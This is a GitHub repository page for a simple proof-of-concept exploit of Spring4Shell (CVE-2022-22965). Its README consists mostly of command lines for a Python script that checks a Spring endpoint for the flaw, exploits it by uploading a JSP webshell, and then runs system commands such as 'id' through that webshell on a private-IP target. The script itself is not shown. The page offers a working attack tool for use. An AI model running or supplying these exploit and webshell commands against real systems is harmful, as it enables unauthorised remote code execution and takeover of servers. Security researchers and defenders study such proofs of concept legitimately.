Skip to content

rwincey/spring4shell-CVE-2022-22965

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

Simple Spring4Shell POC

  • Check if endpoint is vulnerable

python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting --check

  • Exploit vulnerable endpoint

python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting -f shell.jsp --exploit

  • Execute command on uploaded webshell

python spring4shell.py -u http://192.168.110.117:8080/shell.jsp --cmd id

WebPage

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages